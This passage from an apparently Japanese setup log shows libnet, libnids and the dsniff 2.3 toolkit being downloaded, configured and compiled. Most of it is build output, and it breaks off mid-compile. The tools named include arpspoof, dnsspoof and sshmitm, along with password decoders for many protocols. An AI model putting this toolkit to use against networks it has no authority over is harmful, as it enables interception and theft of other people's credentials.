src/libnet_port_list.c:271: warning: pointer targets in return differ in signedness
ar -cr lib/libnet.a src/libnet_resolve.o src/libnet_socket.o src/libnet_checksum.o src/libnet_prand.o src/libnet_version.o src/libnet_write_ip.o src/libnet_insert_ipo.o src/libnet_insert_tcpo.o src/libnet_error.o src/libnet_link_sockpacket.o src/libnet_packet_mem.o src/libnet_build_ip.o src/libnet_build_tcp.o src/libnet_build_udp.o src/libnet_build_arp.o src/libnet_build_ethernet.o src/libnet_build_icmp.o src/libnet_build_igmp.o src/libnet_build_dns.o src/libnet_build_snmp.o src/libnet_build_rip.o src/libnet_build_ospf.o src/libnet_build_vrrp.o src/libnet_asn1.o src/libnet_hex_dump.o src/libnet_if_addr.o src/libnet_port_list.o
ranlib lib/libnet.a

wirehork:/usr/local/src/Libnet-1.0.2a# make install
ar -cr lib/libnet.a src/libnet_resolve.o src/libnet_socket.o src/libnet_checksum.o src/libnet_prand.o src/libnet_version.o src/libnet_write_ip.o src/libnet_insert_ipo.o src/libnet_insert_tcpo.o src/libnet_error.o src/libnet_link_sockpacket.o src/libnet_packet_mem.o src/libnet_build_ip.o src/libnet_build_tcp.o src/libnet_build_udp.o src/libnet_build_arp.o src/libnet_build_ethernet.o src/libnet_build_icmp.o src/libnet_build_igmp.o src/libnet_build_dns.o src/libnet_build_snmp.o src/libnet_build_rip.o src/libnet_build_ospf.o src/libnet_build_vrrp.o src/libnet_asn1.o src/libnet_hex_dump.o src/libnet_if_addr.o src/libnet_port_list.o
ranlib lib/libnet.a
./ensure-dir.sh /usr 755
./ensure-dir.sh /usr/lib/ 755
./ensure-dir.sh /usr/include/libnet 755
./ensure-dir.sh /usr/include/ 755
./ensure-dir.sh /usr/man/man3/ 755
./ensure-dir.sh /usr/bin/ 755
./install-sh lib/libnet.a /usr/lib/
rm -f /usr/lib/libpwrite.a
cd /usr/lib/; ln -f -s libnet.a libpwrite.a
./install-sh include/libnet.h /usr/include/
./install-sh include/libnet/libnet-headers.h /usr/include/libnet
./install-sh include/libnet/libnet-functions.h /usr/include/libnet
./install-sh include/libnet/libnet-structures.h /usr/include/libnet
./install-sh include/libnet/libnet-macros.h /usr/include/libnet
./install-sh include/libnet/libnet-asn1.h /usr/include/libnet
./install-sh include/libnet/libnet-ospf.h /usr/include/libnet
./install-sh doc/libnet.3 /usr/man/man3/
./install-sh libnet-config /usr/bin/

wirehork:/usr/local/src/Libnet-1.0.2a# cd ..

3)libnidsのインストール
libnids は、Version1.18をインストールすること。
wirehork:/usr/local/src# wget http://www.packetfactory.net/Projects/libnids/dist/libnids-1.18.tar.gz
–14:22:43– http://www.packetfactory.net/Projects/libnids/dist/libnids-1.18.tar.gz
=> `libnids-1.18.tar.gz’
Resolving www.packetfactory.net… 69.42.82.105
Connecting to www.packetfactory.net|69.42.82.105|:80… connected.
HTTP request sent, awaiting response… 200 OK
Length: 114,013 (111K) [application/x-gzip]

100%[====================================>] 114,013 100.11K/s

14:22:46 (99.86 KB/s) – `libnids-1.18.tar.gz’ saved [114013/114013]

wirehork:/usr/local/src# tar zxvf libnids-1.18.tar.gz
libnids-1.18/
libnids-1.18/src/
libnids-1.18/src/checksum.c
libnids-1.18/src/ip_fragment.c
libnids-1.18/src/ip_fragment.h
libnids-1.18/src/ip_options.c
libnids-1.18/src/killtcp.c
libnids-1.18/src/libnids.c
libnids-1.18/src/scan.c
libnids-1.18/src/scan.h
libnids-1.18/src/tcp.c
libnids-1.18/src/tcp.h
libnids-1.18/src/util.c
libnids-1.18/src/util.h
libnids-1.18/src/Makefile.in
libnids-1.18/src/libnids.3
libnids-1.18/src/libnids.3.mdoc
libnids-1.18/src/checksum.h
libnids-1.18/src/config.h.in
libnids-1.18/src/hash.c
libnids-1.18/src/allpromisc.c
libnids-1.18/src/hash.h
libnids-1.18/src/nids.h
libnids-1.18/doc/
libnids-1.18/doc/PATCH
libnids-1.18/doc/TESTS
libnids-1.18/doc/bugtraq_post
libnids-1.18/doc/NEW_LIBPCAP
libnids-1.18/doc/API.html
libnids-1.18/doc/API.txt
libnids-1.18/doc/LINUX
libnids-1.18/doc/PERFORMANCE
libnids-1.18/COPYING
libnids-1.18/MISC
libnids-1.18/README
libnids-1.18/samples/
libnids-1.18/samples/overflows.c
libnids-1.18/samples/printall.c
libnids-1.18/samples/nids_next.c
libnids-1.18/samples/sniff.c
libnids-1.18/samples/Makefile.in
libnids-1.18/CREDITS
libnids-1.18/CHANGES
libnids-1.18/install-sh
libnids-1.18/configure.in
libnids-1.18/Makefile.in
libnids-1.18/configure
libnids-1.18/mkinstalldirs
libnids-1.18/config.guess
libnids-1.18/config.sub

wirehork:/usr/local/src# chown -R root.root libnids-1.18

wirehork:/usr/local/src# cd libnids-1.18

wirehork:/usr/local/src/libnids-1.18# ./configure
checking build system type… i686-pc-linux-gnu
checking host system type… i686-pc-linux-gnu
checking target system type… i686-pc-linux-gnu
checking for gcc… gcc
checking for C compiler default output… a.out
checking whether the C compiler works… yes
checking whether we are cross compiling… no
checking for suffix of executables…
checking for suffix of object files… o
checking whether we are using the GNU C compiler… yes
checking whether gcc accepts -g… yes
checking for ranlib… ranlib
checking for a BSD-compatible install… /usr/bin/install -c
checking how to run the C preprocessor… gcc -E
checking for ANSI C header files… yes
checking for sys/types.h… yes
checking for sys/stat.h… yes
checking for stdlib.h… yes
checking for string.h… yes
checking for memory.h… yes
checking for strings.h… yes
checking for inttypes.h… yes
checking for stdint.h… yes
checking for unistd.h… yes
checking sys/time.h usability… yes
checking sys/time.h presence… yes
checking for sys/time.h… yes
checking syslog.h usability… yes
checking syslog.h presence… yes
checking for syslog.h… yes
checking for unistd.h… (cached) yes
checking for gcc option to accept ANSI C… none needed
checking for an ANSI C-conforming const… yes
checking for inline… inline
checking whether time.h and sys/time.h may both be included… yes
checking whether byte ordering is bigendian… no
checking for gettimeofday… yes
checking for socket in -lsocket… no
checking for gethostbyname in -lnsl… yes
checking for libpcap… yes
checking for libnet… yes
checking whether to build shared library… no
checking the name of struct icmp… struct icmphdr
checking if tcp states are defined… yes
checking for bsd-ish struct udphdr… yes
checking libnet version… looks old
configure: creating ./config.status
config.status: creating Makefile
config.status: creating src/Makefile
config.status: creating samples/Makefile
config.status: creating src/config.h

wirehork:/usr/local/src/libnids-1.18# make
cd src ; make static
make[1]: Entering directory `/usr/local/src/libnids-1.18/src’
gcc -c -g -O2 -D_BSD_SOURCE -Wall -DLIBNET_VER=0 -DHAVE_ICMPHDR=1 -DHAVE_TCP_STATES=1 -DHAVE_BSD_UDPHDR=1 -I. -D_BSD_SOURCE -D__BSD_SOURCE -D__FAVOR_BSD -DHAVE_NET_ETHERNET_H -DLIBNET_LIL_ENDIAN checksum.c
checksum.c: In function ‘my_tcp_check’:
checksum.c:180: warning: pointer targets in passing argument 1 of ‘csum_partial’ differ in signedness
checksum.c: In function ‘my_udp_check’:
checksum.c:186: warning: pointer targets in passing argument 1 of ‘csum_partial’ differ in signedness
gcc -c -g -O2 -D_BSD_SOURCE -Wall -DLIBNET_VER=0 -DHAVE_ICMPHDR=1 -DHAVE_TCP_STATES=1 -DHAVE_BSD_UDPHDR=1 -I. -D_BSD_SOURCE -D__BSD_SOURCE -D__FAVOR_BSD -DHAVE_NET_ETHERNET_H -DLIBNET_LIL_ENDIAN ip_fragment.c
ip_fragment.c: In function ‘ip_glue’:
ip_fragment.c:495: warning: pointer targets in assignment differ in signedness
ip_fragment.c: In function ‘ip_defrag’:
ip_fragment.c:603: warning: pointer targets in assignment differ in signedness
gcc -c -g -O2 -D_BSD_SOURCE -Wall -DLIBNET_VER=0 -DHAVE_ICMPHDR=1 -DHAVE_TCP_STATES=1 -DHAVE_BSD_UDPHDR=1 -I. -D_BSD_SOURCE -D__BSD_SOURCE -D__FAVOR_BSD -DHAVE_NET_ETHERNET_H -DLIBNET_LIL_ENDIAN ip_options.c
gcc -c -g -O2 -D_BSD_SOURCE -Wall -DLIBNET_VER=0 -DHAVE_ICMPHDR=1 -DHAVE_TCP_STATES=1 -DHAVE_BSD_UDPHDR=1 -I. -D_BSD_SOURCE -D__BSD_SOURCE -D__FAVOR_BSD -DHAVE_NET_ETHERNET_H -DLIBNET_LIL_ENDIAN killtcp.c
killtcp.c: In function ‘nids_killtcp’:
killtcp.c:24: warning: pointer targets in passing argument 11 of ‘libnet_build_ip’ differ in signedness
killtcp.c:27: warning: pointer targets in passing argument 10 of ‘libnet_build_tcp’ differ in signedness
killtcp.c:28: warning: pointer targets in passing argument 1 of ‘libnet_do_checksum’ differ in signedness
killtcp.c:29: warning: pointer targets in passing argument 2 of ‘libnet_write_ip’ differ in signedness
killtcp.c:32: warning: pointer targets in passing argument 11 of ‘libnet_build_ip’ differ in signedness
killtcp.c:35: warning: pointer targets in passing argument 10 of ‘libnet_build_tcp’ differ in signedness
killtcp.c:36: warning: pointer targets in passing argument 1 of ‘libnet_do_checksum’ differ in signedness
killtcp.c:37: warning: pointer targets in passing argument 2 of ‘libnet_write_ip’ differ in signedness
gcc -c -g -O2 -D_BSD_SOURCE -Wall -DLIBNET_VER=0 -DHAVE_ICMPHDR=1 -DHAVE_TCP_STATES=1 -DHAVE_BSD_UDPHDR=1 -I. -D_BSD_SOURCE -D__BSD_SOURCE -D__FAVOR_BSD -DHAVE_NET_ETHERNET_H -DLIBNET_LIL_ENDIAN libnids.c
libnids.c: In function ‘gen_ip_frag_proc’:
libnids.c:267: warning: pointer targets in passing argument 1 of ‘ip_options_compile’ differ in signedness
libnids.c: In function ‘gen_ip_proc’:
libnids.c:340: warning: pointer targets in passing argument 1 of ‘process_udp’ differ in signedness
libnids.c: In function ‘nids_next’:
libnids.c:532: warning: pointer targets in passing argument 3 of ‘pcap_hand’ differ in signedness
gcc -c -g -O2 -D_BSD_SOURCE -Wall -DLIBNET_VER=0 -DHAVE_ICMPHDR=1 -DHAVE_TCP_STATES=1 -DHAVE_BSD_UDPHDR=1 -I. -D_BSD_SOURCE -D__BSD_SOURCE -D__FAVOR_BSD -DHAVE_NET_ETHERNET_H -DLIBNET_LIL_ENDIAN scan.c
gcc -c -g -O2 -D_BSD_SOURCE -Wall -DLIBNET_VER=0 -DHAVE_ICMPHDR=1 -DHAVE_TCP_STATES=1 -DHAVE_BSD_UDPHDR=1 -I. -D_BSD_SOURCE -D__BSD_SOURCE -D__FAVOR_BSD -DHAVE_NET_ETHERNET_H -DLIBNET_LIL_ENDIAN tcp.c
tcp.c: In function ‘get_ts’:
tcp.c:126: warning: pointer targets in initialization differ in signedness
tcp.c: In function ‘add_from_skb’:
tcp.c:341: warning: pointer targets in passing argument 2 of ‘add2buf’ differ in signedness
tcp.c:357: warning: pointer targets in passing argument 2 of ‘add2buf’ differ in signedness
tcp.c:369: warning: pointer targets in passing argument 2 of ‘add2buf’ differ in signedness
tcp.c: In function ‘tcp_queue’:
tcp.c:402: warning: pointer targets in passing argument 4 of ‘add_from_skb’ differ in signedness
gcc -c -g -O2 -D_BSD_SOURCE -Wall -DLIBNET_VER=0 -DHAVE_ICMPHDR=1 -DHAVE_TCP_STATES=1 -DHAVE_BSD_UDPHDR=1 -I. -D_BSD_SOURCE -D__BSD_SOURCE -D__FAVOR_BSD -DHAVE_NET_ETHERNET_H -DLIBNET_LIL_ENDIAN util.c
gcc -c -g -O2 -D_BSD_SOURCE -Wall -DLIBNET_VER=0 -DHAVE_ICMPHDR=1 -DHAVE_TCP_STATES=1 -DHAVE_BSD_UDPHDR=1 -I. -D_BSD_SOURCE -D__BSD_SOURCE -D__FAVOR_BSD -DHAVE_NET_ETHERNET_H -DLIBNET_LIL_ENDIAN allpromisc.c
gcc -c -g -O2 -D_BSD_SOURCE -Wall -DLIBNET_VER=0 -DHAVE_ICMPHDR=1 -DHAVE_TCP_STATES=1 -DHAVE_BSD_UDPHDR=1 -I. -D_BSD_SOURCE -D__BSD_SOURCE -D__FAVOR_BSD -DHAVE_NET_ETHERNET_H -DLIBNET_LIL_ENDIAN hash.c
ar -cr libnids.a checksum.o ip_fragment.o ip_options.o killtcp.o libnids.o scan.o tcp.o util.o allpromisc.o hash.o
ranlib libnids.a
make[1]: Leaving directory `/usr/local/src/libnids-1.18/src’

wirehork:/usr/local/src/libnids-1.18# make install
cd src ; make _install
make[1]: Entering directory `/usr/local/src/libnids-1.18/src’
../mkinstalldirs /usr/local/lib
../mkinstalldirs /usr/local/include
../mkinstalldirs /usr/local/man/man3
/usr/bin/install -c -c -m 644 libnids.a /usr/local/lib
/usr/bin/install -c -c -m 644 nids.h /usr/local/include
/usr/bin/install -c -c -m 644 libnids.3 /usr/local/man/man3
make[1]: Leaving directory `/usr/local/src/libnids-1.18/src’

wirehork:/usr/local/src/libnids-1.18# cd ..

2.dsniffのインストール

1)ソースのゲット
オフィシャルサイトは、 ここ このサイトからソースをゲットする。

wirehork:/usr/local/src# wget http://monkey.org/~dugsong/dsniff/dsniff-2.3.tar.gz
–15:18:38– http://monkey.org/~dugsong/dsniff/dsniff-2.3.tar.gz
=> `dsniff-2.3.tar.gz’
Resolving monkey.org… 152.160.49.201
Connecting to monkey.org|152.160.49.201|:80… connected.
HTTP request sent, awaiting response… 200 OK
Length: 126,797 (124K) [application/x-gzip]

100%[========================================>] 126,797 62.92K/s

15:18:40 (62.81 KB/s) – `dsniff-2.3.tar.gz’ saved [126797/126797]

2)ソースの展開
wirehork:/usr/local/src# tar zxvf dsniff-2.3.tar.gz
dsniff-2.3
dsniff-2.3/CVS
dsniff-2.3/CVS/Root
dsniff-2.3/CVS/Repository
dsniff-2.3/CVS/Entries
dsniff-2.3/Makefile.in
dsniff-2.3/CHANGES
dsniff-2.3/LICENSE
dsniff-2.3/asn1.c
dsniff-2.3/README
dsniff-2.3/macof.c
dsniff-2.3/missing
dsniff-2.3/missing/strlcat.c
dsniff-2.3/missing/strlcpy.c
dsniff-2.3/missing/dirname.c
dsniff-2.3/missing/ethers.c
dsniff-2.3/missing/md5.c
dsniff-2.3/missing/md5.h
dsniff-2.3/missing/CVS
dsniff-2.3/missing/CVS/Root
dsniff-2.3/missing/CVS/Repository
dsniff-2.3/missing/CVS/Entries
dsniff-2.3/missing/err.c
dsniff-2.3/missing/err.h
dsniff-2.3/missing/sys
dsniff-2.3/missing/sys/queue.h
dsniff-2.3/missing/sys/CVS
dsniff-2.3/missing/sys/CVS/Root
dsniff-2.3/missing/sys/CVS/Repository
dsniff-2.3/missing/sys/CVS/Entries
dsniff-2.3/missing/libgen.h
dsniff-2.3/missing/strsep.c
dsniff-2.3/missing/dummy.c
dsniff-2.3/missing/memcmp.c
dsniff-2.3/macof.8
dsniff-2.3/base64.c
dsniff-2.3/decode.c
dsniff-2.3/decode_aim.c
dsniff-2.3/decode_citrix.c
dsniff-2.3/decode_http.c
dsniff-2.3/acconfig.h
dsniff-2.3/decode_cvs.c
dsniff-2.3/decode_ftp.c
dsniff-2.3/configure.in
dsniff-2.3/install-sh
dsniff-2.3/configure
dsniff-2.3/decode_icq.c
dsniff-2.3/config.h.in
dsniff-2.3/dsniff.c
dsniff-2.3/decode_imap.c
dsniff-2.3/decode_irc.c
dsniff-2.3/decode_ldap.c
dsniff-2.3/tcp_raw.c
dsniff-2.3/decode_mountd.c
dsniff-2.3/decode_napster.c
dsniff-2.3/decode_nntp.c
dsniff-2.3/decode_oracle.c
dsniff-2.3/decode_ospf.c
dsniff-2.3/decode_pcanywhere.c
dsniff-2.3/decode_pop.c
dsniff-2.3/decode_portmap.c
dsniff-2.3/decode_rip.c
dsniff-2.3/decode_rlogin.c
dsniff-2.3/decode_smb.c
dsniff-2.3/decode_sniffer.c
dsniff-2.3/decode_snmp.c
dsniff-2.3/decode_socks.c
dsniff-2.3/decode_telnet.c
dsniff-2.3/decode_x11.c
dsniff-2.3/rpc.c
dsniff-2.3/record.c
dsniff-2.3/trigger.c
dsniff-2.3/magic.c
dsniff-2.3/asn1.h
dsniff-2.3/base64.h
dsniff-2.3/decode.h
dsniff-2.3/options.h
dsniff-2.3/record.h
dsniff-2.3/rpc.h
dsniff-2.3/trigger.h
dsniff-2.3/arp.c
dsniff-2.3/hex.c
dsniff-2.3/hex.h
dsniff-2.3/mailsnarf.c
dsniff-2.3/filesnarf.c
dsniff-2.3/mount.x
dsniff-2.3/remote.c
dsniff-2.3/tcpkill.c
dsniff-2.3/tcpnice.c
dsniff-2.3/urlsnarf.c
dsniff-2.3/version.h
dsniff-2.3/vroot.h
dsniff-2.3/webspy.c
dsniff-2.3/arpspoof.c
dsniff-2.3/dsniff.8
dsniff-2.3/dnsspoof.8
dsniff-2.3/mailsnarf.8
dsniff-2.3/buf.h
dsniff-2.3/tcpkill.8
dsniff-2.3/tcpnice.8
dsniff-2.3/urlsnarf.8
dsniff-2.3/webspy.8
dsniff-2.3/decode_mmxp.c
dsniff-2.3/decode_smtp.c
dsniff-2.3/tcp_raw.h
dsniff-2.3/dsniff.magic
dsniff-2.3/pcaputil.h
dsniff-2.3/decode_tds.c
dsniff-2.3/nfs_prot.x
dsniff-2.3/dsniff.services
dsniff-2.3/decode_postgresql.c
dsniff-2.3/buf.c
dsniff-2.3/msgsnarf.c
dsniff-2.3/dnsspoof.c
dsniff-2.3/magic.h
dsniff-2.3/pathnames.h
dsniff-2.3/sshcrypto.c
dsniff-2.3/webmitm.8
dsniff-2.3/sshmitm.c
dsniff-2.3/decode_yp.c
dsniff-2.3/filesnarf.8
dsniff-2.3/arpspoof.8
dsniff-2.3/pcaputil.c
dsniff-2.3/msgsnarf.8
dsniff-2.3/decode_vrrp.c
dsniff-2.3/TODO
dsniff-2.3/decode_hex.c
dsniff-2.3/webmitm.c
dsniff-2.3/ssh.h
dsniff-2.3/ssh.c
dsniff-2.3/sshcrypto.h
dsniff-2.3/sshmitm.8
dsniff-2.3/.cvsignore
dsniff-2.3/decode_pptp.c
dsniff-2.3/dnsspoof.hosts

wirehork:/usr/local/src# chown -R root.root dsniff-2.3

wirehork:/usr/local/src# cd dsniff-2.3

3)Mikefile作成
wirehork:/usr/local/src/dsniff-2.3# ./configure
creating cache ./config.cache
checking for gcc… gcc
checking whether the C compiler (gcc ) works… yes
checking whether the C compiler (gcc ) is a cross-compiler… no
checking whether we are using GNU C… yes
checking whether gcc accepts -g… yes
checking for a BSD compatible install… /usr/bin/install -c
checking for ranlib… ranlib
checking how to run the C preprocessor… gcc -E
checking for X… no
checking for ANSI C header files… yes
checking for err.h… yes
checking for fcntl.h… yes
checking for sys/ioctl.h… yes
checking for sys/queue.h… yes
checking for unistd.h… yes
checking for libgen.h… yes
checking for net/if_tun.h… no
checking for MIN and MAX in sys/param.h… yes
checking for working const… yes
checking for size_t… yes
checking whether struct tm is in sys/time.h or time.h… time.h
checking for u_int32_t… yes
checking for u_int64_t… yes
checking for in_addr_t… no
checking whether gcc needs -traditional… no
checking for 8-bit clean memcmp… yes
checking return type of signal handlers… void
checking for strftime… yes
checking for gethostname… yes
checking for socket… yes
checking for strdup… yes
checking for strstr… yes
checking for xdr_fhstatus in -lrpcsvc… yes
checking for socket in -lsocket… no
checking for gethostbyname in -lnsl… yes
checking for dn_expand in -lresolv… yes
checking for dirname… yes
checking for strlcpy… no
checking for strlcat… no
checking for strsep… yes
checking for MD5Update… no
checking for warnx… yes
checking for ether_ntoa… yes
checking for Berkeley DB with 1.85 compatibility… yes
checking for libpcap… yes
checking for libnet… yes
checking for libnids… yes
checking whether libnids version is good… yes
checking for OpenSSL… yes
updating cache ./config.cache
creating ./config.status
creating Makefile
creating config.h

4)コンパイル
wirehork:/usr/local/src/dsniff-2.3# make
gcc -g -O2 -D_BSD_SOURCE -D_BSD_SOURCE -D__BSD_SOURCE -D__FAVOR_BSD -DHAVE_NET_ETHERNET_H -DLIBNET_LIL_ENDIAN -DDSNIFF_LIBDIR=\”/usr/local/lib/\” -I. -I/usr/local/include -I./missing -c ./missing/dummy.c
gcc -g -O2 -D_BSD_SOURCE -D_BSD_SOURCE -D__BSD_SOURCE -D__FAVOR_BSD -DHAVE_NET_ETHERNET_H -DLIBNET_LIL_ENDIAN -DDSNIFF_LIBDIR=\”/usr/local/lib/\” -I. -I/usr/local/include -I./missing -c ./missing/strlcpy.c
gcc -g -O2 -D_BSD_SOURCE -D_BSD_SOURCE -D__BSD_SOURCE -D__FAVOR_BSD -DHAVE_NET_ETHERNET_H -DLIBNET_LIL_ENDIAN -DDSNIFF_LIBDIR=\”/usr/local/lib/\” -I. -I/usr/local/include -I./missing -c ./missing/strlcat.c
gcc -g -O2 -D_BSD_SOURCE -D_BSD_SOURCE -D__BSD_SOURCE -D__FAVOR_BSD -DHAVE_NET_ETHERNET_H -DLIBNET_LIL_ENDIAN -DDSNIFF_LIBDIR=\”/usr/local/lib/\” -I. -I/usr/local/include -I./missing -c ./missing/md5.c
ar -cr libmissing.a dummy.o strlcpy.o strlcat.o md5.o
ranlib libmissing.a
gcc -g -O2 -D_BSD_SOURCE -D_BSD_SOURCE -D__BSD_SOURCE -D__FAVOR_BSD -DHAVE_NET_ETHERNET_H -DLIBNET_LIL_ENDIAN -DDSNIFF_LIBDIR=\”/usr/local/lib/\” -I. -I/usr/local/include -I./missing -c ./arpspoof.c
gcc -g -O2 -D_BSD_SOURCE -D_BSD_SOURCE -D__BSD_SOURCE -D__FAVOR_BSD -DHAVE_NET_ETHERNET_H -DLIBNET_LIL_ENDIAN -DDSNIFF_LIBDIR=\”/usr/local/lib/\” -I. -I/usr/local/include -I./missing -c ./arp.c
./arp.c: In function ‘arp_cache_lookup’:
./arp.c:98: warning: incompatible implicit declaration of built-in function ‘memset’
./arp.c:100: warning: incompatible implicit declaration of built-in function ‘strncpy’
./arp.c:114: warning: incompatible implicit declaration of built-in function ‘memcpy’
gcc -o arpspoof arpspoof.o arp.o -lresolv -lnsl -lrpcsvc -L. -lpthread -lmissing -lpcap -lnet
gcc -g -O2 -D_BSD_SOURCE -D_BSD_SOURCE -D__BSD_SOURCE -D__FAVOR_BSD -DHAVE_NET_ETHERNET_H -DLIBNET_LIL_ENDIAN -DDSNIFF_LIBDIR=\”/usr/local/lib/\” -I. -I/usr/local/include -I./missing -c ./dnsspoof.c
gcc -g -O2 -D_BSD_SOURCE -D_BSD_SOURCE -D__BSD_SOURCE -D__FAVOR_BSD -DHAVE_NET_ETHERNET_H -DLIBNET_LIL_ENDIAN -DDSNIFF_LIBDIR=\”/usr/local/lib/\” -I. -I/usr/local/include -I./missing -c ./pcaputil.c
gcc -o dnsspoof dnsspoof.o pcaputil.o -lresolv -lnsl -lrpcsvc -L. -lpthread -lmissing -lpcap -lnet
rpcgen -h mount.x -o mount.h
rpcgen -c mount.x -o mount.c
gcc -g -O2 -D_BSD_SOURCE -D_BSD_SOURCE -D__BSD_SOURCE -D__FAVOR_BSD -DHAVE_NET_ETHERNET_H -DLIBNET_LIL_ENDIAN -DDSNIFF_LIBDIR=\”/usr/local/lib/\” -I. -I/usr/local/include -I./missing -c ./asn1.c
gcc -g -O2 -D_BSD_SOURCE -D_BSD_SOURCE -D__BSD_SOURCE -D__FAVOR_BSD -DHAVE_NET_ETHERNET_H -DLIBNET_LIL_ENDIAN -DDSNIFF_LIBDIR=\”/usr/local/lib/\” -I. -I/usr/local/include -I./missing -c ./base64.c
gcc -g -O2 -D_BSD_SOURCE -D_BSD_SOURCE -D__BSD_SOURCE -D__FAVOR_BSD -DHAVE_NET_ETHERNET_H -DLIBNET_LIL_ENDIAN -DDSNIFF_LIBDIR=\”/usr/local/lib/\” -I. -I/usr/local/include -I./missing -c ./buf.c
./buf.c: In function ‘buf_put’:
./buf.c:96: warning: incompatible implicit declaration of built-in function ‘memcpy’
./buf.c: In function ‘buf_strdup’:
./buf.c:243: warning: incompatible implicit declaration of built-in function ‘memcpy’
gcc -g -O2 -D_BSD_SOURCE -D_BSD_SOURCE -D__BSD_SOURCE -D__FAVOR_BSD -DHAVE_NET_ETHERNET_H -DLIBNET_LIL_ENDIAN -DDSNIFF_LIBDIR=\”/usr/local/lib/\” -I. -I/usr/local/include -I./missing -c ./hex.c
gcc -g -O2 -D_BSD_SOURCE -D_BSD_SOURCE -D__BSD_SOURCE -D__FAVOR_BSD -DHAVE_NET_ETHERNET_H -DLIBNET_LIL_ENDIAN -DDSNIFF_LIBDIR=\”/usr/local/lib/\” -I. -I/usr/local/include -I./missing -c ./magic.c
gcc -g -O2 -D_BSD_SOURCE -D_BSD_SOURCE -D__BSD_SOURCE -D__FAVOR_BSD -DHAVE_NET_ETHERNET_H -DLIBNET_LIL_ENDIAN -DDSNIFF_LIBDIR=\”/usr/local/lib/\” -I. -I/usr/local/include -I./missing -c ./mount.c
gcc -g -O2 -D_BSD_SOURCE -D_BSD_SOURCE -D__BSD_SOURCE -D__FAVOR_BSD -DHAVE_NET_ETHERNET_H -DLIBNET_LIL_ENDIAN -DDSNIFF_LIBDIR=\”/usr/local/lib/\” -I. -I/usr/local/include -I./missing -c ./rpc.c
gcc -g -O2 -D_BSD_SOURCE -D_BSD_SOURCE -D__BSD_SOURCE -D__FAVOR_BSD -DHAVE_NET_ETHERNET_H -DLIBNET_LIL_ENDIAN -DDSNIFF_LIBDIR=\”/usr/local/lib/\” -I. -I/usr/local/include -I./missing -c ./tcp_raw.c
gcc -g -O2 -D_BSD_SOURCE -D_BSD_SOURCE -D__BSD_SOURCE -D__FAVOR_BSD -DHAVE_NET_ETHERNET_H -DLIBNET_LIL_ENDIAN -DDSNIFF_LIBDIR=\”/usr/local/lib/\” -I. -I/usr/local/include -I./missing -c ./trigger.c
gcc -g -O2 -D_BSD_SOURCE -D_BSD_SOURCE -D__BSD_SOURCE -D__FAVOR_BSD -DHAVE_NET_ETHERNET_H -DLIBNET_LIL_ENDIAN -DDSNIFF_LIBDIR=\”/usr/local/lib/\” -I. -I/usr/local/include -I./missing -c ./record.c
gcc -g -O2 -D_BSD_SOURCE -D_BSD_SOURCE -D__BSD_SOURCE -D__FAVOR_BSD -DHAVE_NET_ETHERNET_H -DLIBNET_LIL_ENDIAN -DDSNIFF_LIBDIR=\”/usr/local/lib/\” -I. -I/usr/local/include -I./missing -c ./dsniff.c
gcc -g -O2 -D_BSD_SOURCE -D_BSD_SOURCE -D__BSD_SOURCE -D__FAVOR_BSD -DHAVE_NET_ETHERNET_H -DLIBNET_LIL_ENDIAN -DDSNIFF_LIBDIR=\”/usr/local/lib/\” -I. -I/usr/local/include -I./missing -c ./decode.c
gcc -g -O2 -D_BSD_SOURCE -D_BSD_SOURCE -D__BSD_SOURCE -D__FAVOR_BSD -DHAVE_NET_ETHERNET_H -DLIBNET_LIL_ENDIAN -DDSNIFF_LIBDIR=\”/usr/local/lib/\” -I. -I/usr/local/include -I./missing -c ./decode_aim.c
gcc -g -O2 -D_BSD_SOURCE -D_BSD_SOURCE -D__BSD_SOURCE -D__FAVOR_BSD -DHAVE_NET_ETHERNET_H -DLIBNET_LIL_ENDIAN -DDSNIFF_LIBDIR=\”/usr/local/lib/\” -I. -I/usr/local/include -I./missing -c ./decode_citrix.c
gcc -g -O2 -D_BSD_SOURCE -D_BSD_SOURCE -D__BSD_SOURCE -D__FAVOR_BSD -DHAVE_NET_ETHERNET_H -DLIBNET_LIL_ENDIAN -DDSNIFF_LIBDIR=\”/usr/local/lib/\” -I. -I/usr/local/include -I./missing -c ./decode_cvs.c
gcc -g -O2 -D_BSD_SOURCE -D_BSD_SOURCE -D__BSD_SOURCE -D__FAVOR_BSD -DHAVE_NET_ETHERNET_H -DLIBNET_LIL_ENDIAN -DDSNIFF_LIBDIR=\”/usr/local/lib/\” -I. -I/usr/local/include -I./missing -c ./decode_ftp.c
gcc -g -O2 -D_BSD_SOURCE -D_BSD_SOURCE -D__BSD_SOURCE -D__FAVOR_BSD -DHAVE_NET_ETHERNET_H -DLIBNET_LIL_ENDIAN -DDSNIFF_LIBDIR=\”/usr/local/lib/\” -I. -I/usr/local/include -I./missing -c ./decode_hex.c
gcc -g -O2 -D_BSD_SOURCE -D_BSD_SOURCE -D__BSD_SOURCE -D__FAVOR_BSD -DHAVE_NET_ETHERNET_H -DLIBNET_LIL_ENDIAN -DDSNIFF_LIBDIR=\”/usr/local/lib/\” -I. -I/usr/local/include -I./missing -c ./decode_http.c
gcc -g -O2 -D_BSD_SOURCE -D_BSD_SOURCE -D__BSD_SOURCE -D__FAVOR_BSD -DHAVE_NET_ETHERNET_H -DLIBNET_LIL_ENDIAN -DDSNIFF_LIBDIR=\”/usr/local/lib/\” -I. -I/usr/local/include -I./missing -c ./decode_icq.c
gcc -g -O2 -D_BSD_SOURCE -D_BSD_SOURCE -D__BSD_SOURCE -D__FAVOR_BSD -DHAVE_NET_ETHERNET_H -DLIBNET_LIL_ENDIAN -DDSNIFF_LIBDIR=\”/usr/local/lib/\” -I. -I/usr/local/include -I./missing -c ./decode_imap.c
gcc -g -O2 -D_BSD_SOURCE -D_BSD_SOURCE -D__BSD_SOURCE -D__FAVOR_BSD -DHAVE_NET_ETHERNET_H -DLIBNET_LIL_ENDIAN -DDSNIFF_LIBDIR=\”/usr/local/lib/\” -I. -I/usr/local/include -I./missing -c ./decode_irc.c
gcc -g -O2 -D_BSD_SOURCE -D_BSD_SOURCE -D__BSD_SOURCE -D__FAVOR_BSD -DHAVE_NET_ETHERNET_H -DLIBNET_LIL_ENDIAN -DDSNIFF_LIBDIR=\”/usr/local/lib/\” -I. -I/usr/local/include -I./missing -c ./decode_ldap.c
gcc -g -O2 -D_BSD_SOURCE -D_BSD_SOURCE -D__BSD_SOURCE -D__FAVOR_BSD -DHAVE_NET_ETHERNET_H -DLIBNET_LIL_ENDIAN -DDSNIFF_LIBDIR=\”/usr/local/lib/\” -I. -I/usr/local/include -I./missing -c ./decode_mmxp.c
